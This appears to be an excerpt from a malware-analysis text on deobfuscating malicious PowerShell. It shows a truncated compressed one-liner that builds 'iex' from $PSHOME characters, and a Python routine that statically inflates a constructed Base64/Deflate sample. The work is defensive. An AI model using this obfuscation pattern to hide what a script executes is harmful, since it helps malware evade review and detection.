Deobfuscating malicious PowerShell scripts
Perhaps one of the most common scripting languages in use for both malicious and legitimate administration purposes is the built-in Windows scripting engine based on .NET—PowerShell.
PowerShell has been readily embraced by threat actors, red teamers, and systems administrators alike because of how much it can do.
As a result of this power, it's also incredibly easy to obfuscate PowerShell scripts in many different ways. We'll take a look at a few examples exclusive to PowerShell, and a real-world example utilized by Emotet!
First, we'll look at a few obfuscation techniques that are largely unique to PowerShell malware samples.
Compression
The first method (which is one of the most commonly utilized obfuscation methods) is compression, as shown in the following code snippet:
.($pshOme[21]+$PsHomE[30]+'X') (NEw-obJECt iO.STREAmREAdER ( ( NEw...
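To recover a payload like this without running it, here is an added Python example (not the book's code) that resolves the $PSHOME character-indexing trick to its literal and statically inflates the Base64-wrapped Deflate stream that such one-liners feed to Invoke-Expression. It assumes the default $PSHOME path and the usual DeflateStream/FromBase64String shape of the wrapper, and builds its own constructed sample.

```python
import base64
import re
import zlib

# Assumption: default $PSHOME on a 64-bit Windows host. The snippet builds
# "ieX" (Invoke-Expression) by indexing characters out of this string.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

def resolve_pshome_indexes(expr: str) -> str:
    """Turn "$pshOme[21]+$PsHomE[30]+'X'" style concatenations into the literal."""
    out = []
    for m in re.finditer(r"\$pshome\[(\d+)\]|'([^']*)'", expr, re.IGNORECASE):
        out.append(PSHOME[int(m.group(1))] if m.group(1) else m.group(2))
    return "".join(out)

def inflate_payload(script: str) -> str:
    """Statically recover the script hidden behind the Deflate+Base64 wrapper.

    Finds the FromBase64String('...') argument and inflates it as raw Deflate
    (no zlib header), which is what IO.Compression.DeflateStream produces.
    Nothing from the sample is executed.
    """
    m = re.search(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", script, re.IGNORECASE)
    if not m:
        raise ValueError("no FromBase64String blob found")
    raw = base64.b64decode(m.group(1))
    return zlib.decompress(raw, wbits=-15).decode("utf-8")

# Constructed stand-in for the second stage hidden inside the compressed blob.
HIDDEN = "Write-Host 'second stage would run here'"

def make_sample() -> str:
    """Build a constructed one-liner in the shape of the snippet above."""
    c = zlib.compressobj(wbits=-15)
    blob = base64.b64encode(c.compress(HIDDEN.encode()) + c.flush()).decode()
    return (".($pshOme[21]+$PsHomE[30]+'X') (NEw-obJECt iO.STREAmREAdER "
            "((NEw-obJECt iO.cOMPrEssIoN.dEFLAtEStReAM ([iO.MEmoRYsTrEam] "
            f"[cOnVerT]::FRoMbaSE64StRiNg('{blob}')), "
            "[iO.cOmPResSIon.cOMprEsSioNmOdE]::dEcoMPrESs)), "
            "[TexT.ENcODiNg]::aScIi)).ReAdTOeND()")

if __name__ == "__main__":
    print(resolve_pshome_indexes("$pshOme[21]+$PsHomE[30]+'X'"))  # ieX
    print(inflate_payload(make_sample()))
```

Real samples often nest several such layers, so the recovered text may itself need to be run back through inflate_payload.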